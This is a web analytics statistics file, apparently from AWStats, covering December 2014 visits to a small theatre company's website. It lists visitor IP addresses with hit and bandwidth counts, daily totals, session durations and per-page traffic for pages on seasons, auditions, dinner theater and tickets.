117.169.1.51 1 1 90197 20141219065529
65.55.212.86 0 1 0 
70.199.7.56 4 45 1067224 20141206165438
69.40.187.215 3 17 227617 20141222223726
130.211.184.154 1 1 67042 20141206111550
54.161.87.110 4 36 603374 20141213232827
71.60.118.150 1 11 246618 20141205214129
54.175.97.97 1 1 20007 20141231195054
201.62.48.2 1 8 172523 20141210175415
173.75.13.197 2 28 678463 20141203030649
144.76.185.173 10 11 506284 20141230023850
189.126.187.56 1 29 753498 20141211131740
189.31.208.214 1 28 718616 20141213082545
32.216.2.197 0 1 7505 
117.205.134.200 0 1 12238 
66.249.84.224 2 2 134084 20141208092556
123.125.71.96 1 1 24689 20141209034708
96.241.114.138 0 1 35665 
65.55.218.49 1 1 20007 20141217160422
173.209.212.219 0 1 62481 
71.126.36.195 1 12 154236 20141211182557
74.96.65.3 11 44 709991 20141226072914
84.54.187.224 1 1 82217 20141212080447
188.244.47.215 3 27 470535 20141218232739
177.204.89.191 1 25 641262 20141211072602
4.49.117.146 2 14 200301 20141229090358
54.145.158.227 1 9 125489 20141222043609
70.198.193.134 3 64 1487172 20141213121235
5.165.245.242 1 9 125489 20141226160132
204.210.241.49 0 1 18186 
61.135.190.220 2 2 87049 20141228103704
207.172.186.71 4 4 0 20141227110947
72.95.253.168 1 12 177129 20141204194503
197.158.28.119 1 25 611222 20141213032146
23.127.242.6 0 1 25963 
117.169.1.130 1 1 210640 20141218204101
144.76.163.48 1 1 28631 20141202000234
220.181.108.83 1 1 21334 20141209034708
98.111.229.57 1 11 152949 20141204004319
217.31.112.81 1 12 163935 20141219090927
173.209.212.155 0 1 23762 
65.55.218.55 0 1 5617 
69.47.4.53 0 1 47998 
24.3.167.51 1 12 164785 20141207093757
117.169.1.35 1 1 93394 20141218233527
76.164.225.90 2 2 134084 20141209172856
67.43.109.90 1 12 154000 20141223024256
24.239.217.133 1 11 154000 20141228112619
98.139.134.96 1 1 20007 20141222084406
71.60.139.223 2 14 199250 20141222211816
24.46.85.72 1 25 641262 20141209124258
177.205.151.120 1 25 641262 20141207192949
213.133.97.216 4 4 40014 20141231140746
72.95.245.202 8 103 2010652 20141220004113
76.198.49.16 0 2 37424 
92.63.88.68 1 1 20007 20141219172712
91.236.75.205 1 1 20862 20141202123749
66.249.83.205 3 3 60021 20141227120125
208.93.104.7 1 1 20007 20141230231043
207.46.13.29 0 1 23762 
192.184.71.131 1 1 20007 20141224040716
93.85.215.198 1 1 93398 20141218113647
65.52.246.161 1 1 20007 20141216182118
24.239.224.117 1 11 154000 20141224152135
199.30.25.129 0 1 3658 
174.236.3.228 0 1 7505 
24.63.96.64 0 1 7505 
122.163.195.168 1 11 154000 20141219030022
74.71.231.144 0 2 59085 
209.147.118.181 1 7 170198 20141210000701
73.40.146.240 1 11 154000 20141222212711
200.203.154.73 1 25 641262 20141208093311
123.125.71.40 1 1 67042 20141209103826
24.3.142.39 2 15 200301 20141229192821
62.253.222.52 1 11 154000 20141218075025
23.23.25.0 2 2 40014 20141222043421
208.58.28.68 2 13 170286 20141219225206
54.174.22.84 2 2 43228 20141219055616
111.10.57.188 1 1 78236 20141212085414
24.3.85.61 1 25 641262 20141212074000
130.211.152.241 1 1 67042 20141202111534
173.252.103.1 0 1 25506 
62.210.88.195 21 21 467571 20141230132301
2.39.9.133 1 11 154000 20141216113406
74.109.207.93 1 12 177129 20141204071117
187.244.31.98 1 1 20007 20141219144759
112.18.48.188 1 1 93544 20141217192151
199.30.24.69 0 1 62481 
66.87.91.100 1 25 641262 20141202194054
211.244.83.248 1 1 67042 20141201070511
220.181.108.167 1 1 67042 20141205205055
123.125.71.22 1 1 52865 20141209034708
131.0.162.179 1 26 654811 20141212184638
60.250.162.11 0 1 62481 
67.171.81.86 1 25 519698 20141201174017
71.126.45.37 1 11 154000 20141223222302
152.133.6.194 2 23 200301 20141222134408
70.166.21.141 2 26 511541 20141225223643
64.233.172.165 3 7 199314 20141223120407
74.109.202.100 3 16 196929 20141217181045
72.23.174.254 1 12 177129 20141226224507
67.165.111.86 6 50 1114580 20141214100301
174.109.164.144 3 16 222422 20141217212731
65.55.218.36 0 1 0 
71.182.141.217 1 25 641262 20141212215904
140.207.198.156 1 1 67042 20141212150232
72.65.221.57 5 31 633612 20141219092929
76.78.5.120 2 29 675219 20141201180610
184.167.12.97 2 12 174007 20141222162051
212.156.223.239 1 25 641262 20141202085347
177.104.196.141 1 11 154000 20141227122816
24.151.160.21 1 11 154000 20141222015505
177.177.41.164 1 24 641262 20141203171518
96.47.224.42 0 25 594050 
50.132.34.40 0 1 8579 
67.43.105.182 2 14 200301 20141229003748
65.55.107.248 0 1 25506 
71.60.109.224 2 28 675219 20141211114435
66.87.75.79 2 12 154000 20141218012406
98.236.11.85 3 43 1045104 20141207180624
70.199.3.175 3 29 557842 20141225141746
50.197.56.97 1 11 154000 20141229093513
204.128.128.44 2 27 660835 20141215131244
166.137.252.49 1 25 641262 20141203003502
69.171.163.190 7 24 293003 20141215202759
50.139.172.153 0 1 7505 
200.192.211.242 1 11 154000 20141224055431
38.100.21.63 8 11 172522 20141218112256
141.105.71.177 1 1 20862 20141201010109
191.181.111.133 1 11 154000 20141229154712
108.17.84.193 1 11 154000 20141225013254
54.165.233.212 1 1 67042 20141202132448
148.251.153.164 1 1 67042 20141201064019
98.236.254.18 3 51 1152803 20141215230032
24.3.246.202 6 59 1238278 20141221164030
24.131.74.235 1 11 154000 20141227021541
213.110.133.221 6 6 402252 20141214042241
24.3.34.79 1 11 0 20141218181639
71.182.197.35 3 28 528635 20141222202451
79.83.135.173 1 24 576169 20141212122618
78.46.156.162 1 1 67042 20141210101952
179.180.34.213 1 11 154000 20141230204039
98.139.190.56 0 1 18186 
98.219.182.97 2 13 176121 20141229183236
128.237.173.202 2 22 154000 20141218134406
65.55.212.80 1 1 67042 20141210075120
200.199.168.129 1 27 673523 20141207104614
131.253.24.133 0 2 31894 
65.55.210.58 0 2 28511 
74.98.250.131 2 14 199250 20141219115722
90.170.185.139 1 11 154000 20141227131357
178.32.216.70 1 1 0 20141206161826
76.125.140.14 7 56 1059518 20141227010237
174.250.96.110 1 11 154000 20141218085255
192.34.61.239 11 14 361725 20141230212507
179.212.222.140 1 11 154000 20141216222728
130.211.186.119 1 1 67042 20141211111505
112.64.235.246 1 4 153851 20141214054444
104.34.143.88 5 19 262362 20141230101347
186.118.42.155 1 26 659974 20141201123140
189.93.132.43 1 6 114192 20141228112853
73.183.27.95 1 11 154000 20141226161912
174.129.185.83 1 1 20007 20141217030404
75.81.48.57 1 25 641262 20141213002722
70.198.199.247 1 13 177129 20141226170400
179.107.23.50 1 19 512018 20141203174644
65.55.218.38 0 1 3164 
65.55.218.52 1 3 88929 20141215163653
65.205.5.170 0 3 0 
177.134.156.107 1 11 154000 20141220034436
201.22.95.156 0 1 566 
85.241.177.245 1 11 154000 20141229200548
187.13.78.110 1 25 641262 20141205173545
190.208.87.147 1 11 154000 20141220124556
66.119.48.175 0 1 8082 
98.219.196.96 1 25 641262 20141211213430
104.154.19.46 2 21 283147 20141225225321
208.93.104.9 1 1 67042 20141202231012
66.249.93.179 1 7 224357 20141206024648
179.187.135.141 1 14 296610 20141212155723
174.130.31.234 4 32 731804 20141210200410
2.34.105.109 1 11 154000 20141229132744
65.55.218.41 0 5 93619 
201.86.95.79 0 3 111096 
70.199.4.184 2 14 200301 20141220125232
177.5.130.171 1 8 172523 20141202070323
117.173.20.147 1 1 34520 20141217231458
4.49.114.19 2 28 687563 20141212173059
73.40.245.73 1 12 177129 20141228064627
177.95.64.119 1 11 154000 20141216161110
173.252.77.116 0 1 25506 
183.25.121.100 1 8 166906 20141204121850
218.207.53.247 1 1 62113 20141217175841
157.55.39.87 0 1 566 
107.178.211.191 1 1 20007 20141231111421
61.135.190.221 0 4 149290 
174.250.97.20 1 2 30306 20141206213010
75.155.66.148 1 27 684688 20141206193039
104.154.16.0 1 9 125489 20141227182329
73.34.174.52 0 1 23295 
37.77.120.127 1 25 641262 20141209081145
207.91.54.63 1 25 641262 20141209025122
81.144.138.34 22 22 581648 20141208140610
130.211.113.205 1 1 20007 20141217151820
72.95.224.103 2 40 998803 20141202225648
73.174.173.65 1 11 154000 20141219143042
117.169.1.120 1 1 59809 20141212122959
71.60.14.249 14 14 860608 20141231113113
213.179.252.191 1 1 67042 20141212200047
70.197.160.109 1 11 154000 20141228100354
177.0.223.8 1 26 654811 20141207234353
23.22.238.254 1 1 20007 20141215201045
92.242.35.54 2 2 87049 20141222223229
70.215.1.192 0 1 7505 
72.95.208.181 3 44 1069957 20141201184516
66.220.152.113 0 1 42728 
199.30.24.121 0 1 24853 
199.30.25.245 1 11 154000 20141227084635
71.182.151.7 2 27 663383 20141210134751
199.115.231.114 3 3 162898 20141226132857
223.86.211.21 1 1 88000 20141218185831
78.213.101.117 1 25 641262 20141211173347
67.163.229.81 2 28 675219 20141211082449
161.231.218.149 0 1 7505 
82.56.38.131 1 8 172523 20141214175647
70.199.7.89 1 25 641262 20141213175326
202.46.56.152 1 1 20007 20141225215131
32.214.49.141 0 2 15010 
50.128.143.124 6 37 779264 20141208123907
187.94.31.96 1 8 172523 20141202202025
177.172.56.110 1 1 67042 20141207134601
65.55.210.51 0 2 28511 
61.135.190.102 2 5 220893 20141207020505
206.193.250.169 1 22 520039 20141211112707
23.95.29.74 1 1 67042 20141210153142
71.60.141.175 4 31 748732 20141213213602
69.58.178.57 10 10 348404 20141211135005
177.157.85.199 1 8 119116 20141228232659
174.132.16.36 4 4 0 20141228023731
104.154.27.103 1 11 154000 20141222033044
191.255.4.243 1 25 641262 20141215121631
54.82.161.150 1 2 77096 20141206131119
46.38.63.245 3 3 60021 20141227052036
23.88.106.213 1 1 20862 20141211005003
187.120.182.8 1 11 154000 20141216221745
190.52.181.207 1 25 641262 20141203170445
173.75.156.252 1 25 641262 20141208180334
72.95.245.118 2 29 687563 20141201173029
117.169.1.58 1 1 423422 20141212091737
74.122.53.30 0 1 12238 
173.209.212.217 0 2 32985 
148.251.75.46 1 1 22408 20141216081036
108.162.56.66 1 11 154000 20141216164949
199.30.24.22 0 2 29379 
173.252.77.118 0 2 65542 
62.75.217.24 1 1 67042 20141202203333
131.253.24.131 1 5 105119 20141201130846
173.209.212.205 1 4 29355 20141219210233
60.52.95.36 1 8 172523 20141212053017
71.60.175.200 1 19 415526 20141214171030
98.21.81.169 1 25 641262 20141201145344
71.182.247.202 1 11 154000 20141231100319
104.154.16.141 1 25 641262 20141204165027
54.77.128.214 1 1 20007 20141220160936
108.171.130.188 1 11 152949 20141201161606
37.57.231.125 1 1 67042 20141213050530
65.113.89.157 1 11 154000 20141227114107
61.239.216.68 1 11 154000 20141229110507
69.35.177.179 5 26 303999 20141226210817
70.193.208.38 0 1 12238 
191.181.58.188 1 31 785316 20141210184702
31.13.100.118 0 1 42728 
71.210.52.2 0 1 12238 
130.211.178.91 1 1 20007 20141226111531
187.18.105.191 1 11 154000 20141229160540
24.2.25.7 1 1 81397 20141214220050
67.163.226.189 2 10 253114 20141212130055
173.209.212.225 0 3 5417 
73.38.165.142 0 1 7505 
207.255.106.83 6 50 1120988 20141212100259
166.137.244.91 1 11 154000 20141220172014
66.249.93.185 1 15 346238 20141221172148
71.60.137.109 3 29 557842 20141221233300
87.17.34.112 1 25 641262 20141214122301
199.30.24.103 0 2 28511 
108.32.7.18 4 17 242428 20141222232403
199.30.24.176 0 1 1814 
117.169.1.95 1 1 93544 20141212112819
70.198.192.83 1 11 154000 20141215205833
207.91.59.100 1 12 177129 20141222084204
204.6.91.243 0 3 6382 
177.236.18.231 1 25 641262 20141207171416
70.89.226.65 3 30 689182 20141215104134
179.230.92.79 1 8 172523 20141203182709
141.189.251.1 0 10 0 
65.55.212.82 1 3 40011 20141227020601
187.255.94.97 1 25 641262 20141212172631
221.178.17.191 1 1 39935 20141218120919
131.253.24.156 0 1 6874 
105.225.3.88 1 11 154000 20141217090431
60.250.162.13 0 1 5617 
177.139.131.253 1 11 154000 20141229125038
108.17.126.140 2 14 187957 20141229185728
146.148.40.28 1 1 20007 20141218111630
23.239.21.134 1 1 20007 20141216191026
24.23.104.26 3 43 1045104 20141208213940
104.154.18.91 1 25 641262 20141206162757
157.55.39.254 0 1 566 
70.198.200.197 1 12 177129 20141209203927
173.252.103.4 0 1 27645 
70.198.193.231 1 8 172523 20141205024818
117.169.1.186 1 1 79029 20141219020737
173.75.1.126 1 25 641262 20141214135726
177.78.196.222 1 11 154000 20141222161405
183.60.243.189 2 2 40014 20141230220519
72.21.217.98 1 1 67042 20141204132447
202.46.52.132 1 1 20007 20141226145030
223.86.2.221 1 1 47714 20141217220451
174.242.242.122 1 2 25624 20141227110258
107.1.155.82 1 11 154000 20141226155630
98.229.102.122 0 2 15010 
67.176.105.47 13 72 2050507 20141213161800
104.143.12.42 3 3 201126 20141211182154
67.165.105.156 1 12 155140 20141221225810
187.67.162.158 1 27 673523 20141208192538
117.169.1.71 1 1 62113 20141212102413
98.110.171.196 0 1 27645 
65.55.218.60 0 2 8781 
71.182.247.98 4 32 591799 20141217005406
93.62.18.43 1 25 641262 20141204185146
104.154.16.167 1 24 616409 20141205085338
46.4.29.4 1 1 67042 20141206024647
50.199.197.193 0 1 7505 
208.110.85.226 1 1 67042 20141202111418
176.57.143.60 1 1 47388 20141212124748
72.23.86.185 0 1 5617 
93.186.202.244 3 3 120204 20141223101826
173.172.187.24 0 1 21102 
37.139.52.23 18 18 642336 20141231055322
70.193.211.254 2 14 187957 20141231175915
24.3.50.253 3 30 691505 20141204202454
176.99.215.168 1 9 125489 20141218232737
66.102.6.34 1 1 67042 20141207130502
173.71.167.68 5 35 768438 20141207172513
198.57.210.25 1 1 67042 20141208230447
66.249.88.140 2 2 87049 20141219090750
96.235.30.20 5 61 1249513 20141216092540
24.114.77.124 0 1 7505 
98.239.213.253 6 45 939005 20141222202356
104.143.12.10 5 5 288175 20141219070031
201.0.181.203 1 11 154000 20141226145522
117.169.1.174 1 1 73683 20141212084721
66.249.88.175 5 5 194105 20141231112513
71.61.255.197 2 27 534670 20141210213521
198.50.147.11 1 1 0 20141219113531
54.91.113.248 3 3 60021 20141215200208
71.182.138.204 3 33 308000 20141218203452
73.52.213.189 6 32 442222 20141228141122
99.7.49.76 0 1 35665 
40.136.2.219 1 11 154000 20141229171154
177.96.129.78 1 11 154000 20141221194951
187.59.89.53 1 7 42338 20141221122656
119.94.26.14 1 11 154000 20141216075431
146.148.84.50 1 1 20007 20141225111422
104.154.16.155 1 21 477734 20141210153633
131.253.24.149 0 1 3165 
54.154.117.0 1 1 20007 20141226161953
78.46.41.37 1 1 67042 20141207002554
187.109.228.42 1 11 154000 20141220150248
75.183.170.68 2 28 687563 20141212222826
71.199.100.58 3 29 557842 20141229142149
187.194.208.59 1 11 154000 20141227165922
204.12.239.50 1 1 67042 20141210113714
216.4.56.161 1 11 154000 20141216115853
177.84.238.246 1 14 296610 20141204184220
72.11.138.222 1 1 20007 20141227170639
174.63.123.180 0 1 7505 
61.135.190.100 0 2 24328 
173.252.101.114 0 1 33298 
70.198.194.213 2 28 687563 20141213023803
73.40.174.2 4 32 721520 20141212094319
32.209.236.21 0 1 7505 
93.57.73.72 1 1 67042 20141203231855
128.237.232.161 1 11 154000 20141216163425
98.21.168.175 2 27 663383 20141212230529
104.154.18.43 1 21 477734 20141206044937
61.135.190.219 3 6 294499 20141224142212
61.220.116.135 1 4 26830 20141223134602
204.195.128.73 1 11 154000 20141222163425
66.146.226.1 2 40 998803 20141208121233
67.163.231.209 1 25 641262 20141211203042
107.10.96.18 0 1 18186 
64.134.186.253 0 1 0 
190.245.242.3 1 26 671139 20141212132900
54.81.155.94 1 1 20007 20141215212842
50.163.231.64 21 157 1852298 20141231162535
130.211.178.35 1 1 20007 20141229111454
2.121.74.177 0 1 23295 
24.61.31.117 0 1 7505 
71.60.61.89 1 12 177129 20141204143824
73.4.107.167 0 2 15010 
175.126.171.16 1 1 67042 20141214235852
94.34.0.217 1 1 540209 20141212193459
70.194.4.188 7 39 1265502 20141208215638
76.125.146.236 1 11 154000 20141226122910
117.175.228.243 1 1 81403 20141219073714
71.61.20.59 1 11 147114 20141218210611
98.239.190.247 3 43 1045104 20141211191836
67.177.8.5 0 1 6324 
134.3.22.228 1 11 154000 20141221134548
4.30.209.231 0 1 18186 
24.92.139.60 5 47 1201961 20141211225259
24.23.121.193 3 16 222422 20141231104713
66.87.92.250 2 40 998803 20141203113814
54.172.70.104 1 1 20007 20141218163134
31.220.15.145 1 1 20007 20141221132750
65.55.210.95 1 9 125489 20141227111741
69.171.228.122 0 2 54377 
107.77.75.124 2 40 998803 20141206154438
70.199.6.221 2 14 200301 20141228191824
205.222.248.208 0 1 27033 
174.242.241.53 4 18 248655 20141220112412
71.61.88.45 3 37 598752 20141231001013
67.171.97.30 4 80 1997606 20141206132249
130.211.131.103 1 1 20007 20141219111541
61.135.190.224 4 10 441786 20141212113307
91.207.5.214 2 2 74054 20141230160333
187.111.15.34 1 20 477734 20141205122623
141.158.215.34 3 30 709683 20141202102618
96.227.124.38 2 2 40014 20141225130708
202.46.48.121 1 1 23542 20141227222613
70.198.202.146 0 1 8082 
148.251.124.42 6 7 265700 20141227150418
32.211.182.234 0 1 7505 
173.252.77.113 0 4 89114 
54.173.230.14 1 1 67042 20141205180909
166.137.252.86 2 26 511541 20141220100555
5.196.12.19 1 1 67042 20141210201307
101.226.66.192 1 1 67042 20141210054856
37.187.67.245 1 1 67042 20141211054506
66.249.83.230 4 11 165674 20141228114041
179.187.191.214 1 11 154000 20141221100926
209.221.90.250 1 25 641262 20141203122623
117.139.26.70 3 3 216347 20141218113554
74.73.171.245 3 30 703849 20141206205022
66.249.88.144 4 4 174098 20141226111715
202.46.48.93 1 1 88000 20141230112638
37.187.35.119 2 2 67042 20141215085953
144.76.201.69 7 7 238325 20141223041530
71.61.20.93 4 32 723422 20141214153618
5.9.214.2 2 2 134084 20141213130132
98.111.213.107 1 24 488369 20141227222635
208.184.77.186 2 40 998803 20141211174200
173.209.212.215 0 2 4924 
73.174.66.172 2 28 687563 20141203214811
54.165.155.43 1 1 0 20141208132341
71.230.117.68 1 11 154000 20141216221619
190.206.199.56 1 25 641262 20141209211858
173.75.35.155 3 29 679530 20141207015816
72.77.66.41 2 13 176121 20141229001020
54.172.234.50 1 1 67042 20141204132503
75.144.5.57 1 25 641262 20141205135957
104.154.16.165 1 20 477168 20141213151957
177.85.190.236 1 11 154000 20141218112619
204.239.124.8 2 14 187957 20141230135358
50.248.83.141 9 46 958982 20141209130413
98.115.62.14 2 14 200301 20141219215115
71.253.71.138 2 28 687563 20141212194255
71.206.222.208 3 31 710971 20141214194719
65.55.218.47 0 3 25920 
174.109.212.92 0 1 2240 
46.237.4.160 1 11 154000 20141227054101
78.186.148.160 1 1 67042 20141203180711
73.174.64.137 1 11 154000 20141221200948
189.159.62.233 1 36 942815 20141214033540
202.46.62.17 1 1 20007 20141220140904
177.44.170.163 1 11 154000 20141227081901
176.57.141.193 1 1 25930 20141215232307
81.249.192.24 1 26 687619 20141212095748
188.51.192.181 1 25 641262 20141206033539
71.245.179.21 1 11 281691 20141227123332
54.87.102.153 4 4 89392 20141222043605
70.198.195.63 3 63 998803 20141206095059
72.37.171.172 5 34 805072 20141212162943
101.226.14.21 1 1 63862 20141211162706
71.61.21.157 2 40 998803 20141213083639
201.29.207.118 1 25 641262 20141208100035
93.147.94.55 1 28 699029 20141214043636
126.92.142.23 1 1 20007 20141228051540
167.88.243.11 0 1 7505 
32.216.170.29 0 1 18186 
161.150.190.28 1 11 154000 20141215192201
131.253.26.224 0 1 62481 
65.55.212.73 0 4 88568 
24.3.247.225 1 11 154000 20141216032409
65.55.218.50 1 9 143585 20141221202941
177.36.45.90 1 8 172523 20141207142806
136.142.172.140 2 28 687563 20141203102336
190.163.211.176 1 11 154000 20141231114910
31.202.241.242 4 4 80028 20141221111715
104.154.22.88 1 11 154000 20141220151714
108.88.250.27 0 2 24476 
37.203.30.8 1 1 124243 20141218105201
98.239.238.43 1 12 177129 20141222174301
46.119.119.184 25 25 1676050 20141213194807
191.7.116.1 1 8 172523 20141214105447
107.0.214.200 4 18 236205 20141223112511
67.165.72.136 2 15 200537 20141202144324
162.39.31.49 4 33 735483 20141203200214
189.120.165.159 1 11 154000 20141226084231
176.9.78.7 2 13 192672 20141218202717
50.163.233.141 1 2 67042 20141213143829
97.65.246.114 4 4 174098 20141230210422
24.131.110.45 2 14 200301 20141220175224
186.176.249.0 1 25 641262 20141206144309
71.61.88.69 1 25 641262 20141202202135
186.0.212.4 1 11 154000 20141227141605
70.199.0.81 2 28 687563 20141207153912
59.167.82.253 1 11 154000 20141229105451
92.124.32.185 1 1 67042 20141209154429
192.34.59.57 11 14 455795 20141206033653
50.110.188.158 3 16 222421 20141225164602
72.77.46.134 3 43 1045104 20141201120248
104.154.18.95 1 21 477734 20141206203349
117.211.82.94 1 1 34443 20141218232529
192.3.182.35 1 1 67042 20141203071139
50.57.64.198 1 1 67042 20141203104435
108.32.72.231 1 25 641262 20141214145821
61.135.190.105 1 7 193625 20141217055751
72.10.105.220 0 1 7505 
67.165.73.248 1 11 154000 20141226081513
65.55.211.250 0 1 8132 
177.87.160.3 1 8 172523 20141214194658
66.249.90.110 0 1 26543 
61.220.116.137 0 1 23762 
70.182.251.173 1 11 154000 20141228162314
72.23.93.11 1 11 154000 20141215234935
65.55.210.38 0 5 41735 
50.163.238.141 2 14 199250 20141206140413
178.137.94.34 12 12 804504 20141206202431
87.23.172.115 1 11 154000 20141227135247
173.44.37.250 0 26 617812 
117.139.28.68 1 1 2885415 20141212124314
201.34.148.172 1 1 20007 20141216133317
125.25.205.76 0 8 251196 
98.239.236.141 3 16 194428 20141218192243
70.208.74.100 2 14 200301 20141216115541
107.77.76.117 1 12 154000 20141216165347
202.46.62.200 1 1 20007 20141231200652
104.154.22.75 1 21 477734 20141203045442
71.236.83.145 1 11 154000 20141223003034
104.194.94.187 1 1 67042 20141210214550
195.91.224.113 1 9 172523 20141211030420
97.65.87.26 1 4 170290 20141208112026
54.174.102.61 1 1 0 20141205072518
62.210.91.168 26 26 630243 20141222204710
175.110.166.124 1 11 154000 20141223042443
112.18.172.172 1 1 34758 20141218105057
134.119.24.85 1 1 20007 20141216140751
201.11.142.8 1 24 641262 20141207120823
12.30.47.234 2 14 200301 20141218113349
71.236.115.157 3 29 557842 20141222161022
75.112.150.186 3 16 216587 20141217142701
93.159.230.28 1 15 230405 20141221141641
211.138.223.194 12 12 2135850 20141219065535
96.47.224.58 0 24 570288 
117.169.1.60 1 1 73683 20141217154013
104.154.25.12 1 21 477734 20141201124859
70.215.10.28 0 1 7505 
76.125.246.87 4 46 1072420 20141207085657
54.92.33.255 1 1 20007 20141215192204
69.13.39.34 1 1 20007 20141228235215
173.209.212.221 1 1 0 20141221143050
138.210.140.4 0 1 8246 
183.222.161.208 1 1 81403 20141218064427
104.154.17.177 1 11 154000 20141219170916
71.206.255.28 1 25 641262 20141207173024
125.25.205.12 1 17 390066 20141209030327
177.133.205.223 1 26 671139 20141215144832
36.55.32.41 1 27 680317 20141210123733
117.173.240.216 1 1 81397 20141218113538
211.244.83.232 2 2 87049 20141229093323
104.154.16.179 1 21 477734 20141201180423
24.3.76.187 5 48 1091320 20141215103956
69.171.228.120 0 2 56420 
174.99.26.220 2 39 1023486 20141204222415
134.249.82.158 3 3 60021 20141217161122
188.250.132.239 1 25 641262 20141205142307
207.46.13.121 0 1 62481 
67.163.226.106 2 22 202518 20141228103432
5.80.245.4 0 1 25518 
205.203.134.197 25 53 691158 20141230001344
24.147.90.176 0 1 7505 
223.85.96.104 1 1 53736 20141218065432
203.106.150.133 1 11 154000 20141229214954
119.63.193.131 1 1 67042 20141209141243
174.76.140.74 2 2 0 20141208070312
208.95.18.93 0 2 41546 
117.26.199.175 1 1 67042 20141201215738
173.72.163.25 1 25 641262 20141204170959
67.61.184.45 0 1 18627 
75.101.171.225 2 2 134084 20141206012405
73.183.73.188 5 19 264549 20141216201549
167.164.3.140 4 46 1069416 20141201144031
201.76.127.230 1 11 0 20141226164147
66.190.183.85 1 11 154000 20141216094442
24.101.104.22 1 11 154000 20141220233419
201.33.174.104 1 22 585132 20141211200410
117.169.1.125 1 1 59238 20141212112628
70.199.1.17 1 11 154000 20141226211526
76.125.214.128 2 14 200301 20141229185959
117.174.229.85 1 1 59238 20141217191919
117.169.1.110 1 1 75712 20141212092838
46.148.229.139 1 6 170198 20141208182055
98.236.192.74 2 13 176121 20141231234325
76.101.146.209 0 1 13549 
141.89.226.151 3 3 154091 20141218020950
50.73.188.121 2 13 176121 20141231080732
130.211.136.36 1 1 20007 20141224111444
66.249.81.149 3 3 107056 20141223171815
71.236.70.190 6 50 1110206 20141203093158
27.159.224.227 1 1 67042 20141202215632
65.27.119.7 3 29 557842 20141215231911
130.211.139.254 1 1 67042 20141210111446
187.18.134.132 1 8 125489 20141227085906
65.55.218.34 0 1 8132 
103.31.225.178 2 2 134084 20141215063814
146.148.67.26 1 1 67042 20141214111515
212.16.238.75 1 1 20007 20141220121207
24.131.74.194 3 17 288168 20141208100905
76.164.206.124 3 3 100071 20141211054039
54.166.16.188 1 1 20007 20141215200728
72.77.100.118 5 48 1114577 20141215223558
98.139.134.98 1 1 20007 20141222084407
24.212.151.151 1 11 154000 20141216233101
75.101.243.11 31 76 4861665 20141207180419
98.236.8.51 3 76 1881693 20141214220904
199.30.25.230 0 2 28511 
73.40.133.132 3 29 556791 20141206071333
50.138.237.0 0 1 7505 
174.250.112.183 3 45 1045104 20141202080131
173.75.35.150 1 11 154000 20141231100142
173.75.1.41 2 20 541118 20141209230330
24.3.20.125 1 25 641262 20141211205717
220.181.108.93 1 1 15045 20141209034708
71.31.178.243 3 17 223709 20141219100436
177.83.198.183 1 11 154000 20141222143836
60.250.162.5 0 3 33551 
4.34.29.122 8 51 950385 20141216120723
178.32.184.6 1 1 67042 20141211201318
71.236.70.167 3 31 705870 20141212084243
71.60.4.183 3 43 1045104 20141206074056
76.125.224.11 3 29 545498 20141231213838
189.114.53.177 1 7 117357 20141223213915
60.250.162.7 0 1 1759 
194.44.245.209 1 1 20007 20141226224228
98.236.10.201 2 23 308000 20141227211541
131.253.24.142 0 1 62481 
98.111.240.34 2 28 687563 20141205104719
166.137.244.45 0 1 12238 
72.65.232.120 3 30 697339 20141201203534
75.76.186.44 2 40 998803 20141211174200
2.38.35.153 1 25 641262 20141206175729
173.44.37.226 0 22 522764 
76.120.146.192 2 28 687563 20141202144822
105.111.30.233 1 8 172523 20141205170850
32.217.28.120 0 1 7505 
146.148.67.236 1 1 67042 20141215111629
75.149.4.82 1 11 154000 20141231104526
130.132.173.74 0 2 15010 
162.242.167.135 2 2 134084 20141201183809
54.235.62.203 1 1 20007 20141216060137
70.199.86.166 1 12 163935 20141208101334
24.214.37.98 2 26 511541 20141217211354
148.251.69.136 5 5 137870 20141231230351
95.92.213.242 1 11 154000 20141228134333
84.223.242.144 1 24 605597 20141201092827
174.242.240.145 3 29 557842 20141228212816
107.20.31.40 2 2 134084 20141212043724
70.199.0.246 4 28 560919 20141216093941
88.198.56.239 8 8 338692 20141230102949
173.209.212.208 1 3 46301 20141219210347
178.32.226.89 2 2 46650 20141219065849
104.154.25.213 1 21 477734 20141206112933
75.173.248.180 0 1 18186 
66.249.88.142 1 1 20007 20141231090133
68.71.156.36 1 1 20862 20141211014502
54.162.98.224 2 18 250978 20141228195149
64.233.172.236 1 1 67042 20141211105851
187.58.141.119 1 36 942815 20141214082440
166.137.252.88 2 40 998803 20141201075330
71.236.100.57 1 11 154000 20141226203552
177.42.24.247 1 11 154000 20141227120216
207.255.5.222 2 40 998803 20141204124744
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141201 100 830 20394662 58
20141202 87 668 17108696 49
20141203 91 1074 25739599 51
20141204 81 683 17313015 51
20141205 82 767 19040355 49
20141206 153 1169 29449538 58
20141207 158 989 27589214 49
20141208 130 785 20233438 50
20141209 111 846 21737557 55
20141210 81 701 15190131 40
20141211 100 865 21535953 53
20141212 130 999 31547532 72
20141213 110 1067 26893307 47
20141214 123 850 21683063 50
20141215 102 703 13967249 64
20141216 123 697 10332889 62
20141217 122 489 13863060 62
20141218 141 443 8958245 71
20141219 99 427 7340908 46
20141220 96 404 5987949 38
20141221 74 361 5288466 39
20141222 158 552 8885426 46
20141223 63 247 4103880 41
20141224 114 235 4299955 29
20141225 44 232 3808837 26
20141226 94 441 6749401 38
20141227 111 471 8183147 49
20141228 90 421 6587886 49
20141229 77 421 6550877 49
20141230 97 273 4614893 30
20141231 66 420 6617712 42
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 2
5mn-15mn 23
0s-30s 1293
2mn-5mn 45
30s-2mn 143
15mn-30mn 1
30mn-1h 6
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 105
/ 1525 64271302 1211 929
/2014mainstageseason.html 247 5999427 30 119
/2014childrensseason.html 143 8606080 17 63
/home.html 139 5758220 28 48
/dinnertheater.html 80 1657420 15 19
/contactus.html 78 1606374 11 38
/2014mainstageauditions.html 74 2193480 7 28
/ticketinformation.html 71 1290240 5 10
/ticketinformation/mainstagetickets.html 68 1620127 3 13
/dinnertheater/pricing.html 60 1208497 1 7
/images/Season_Subscription_Order_Form.pdf 4 352000 4 4
/nonprofitstatus.html 32 469216 0 0
// 1 20007 1 1
/images/Theatre_Camp_Registration_Form_2011.pdf 1 78692 1 1
/images/Apprenticeship_Application.pdf 1 124388 1 1
/images/Flex_Pass_Order_Form.pdf 4 248452 4 4
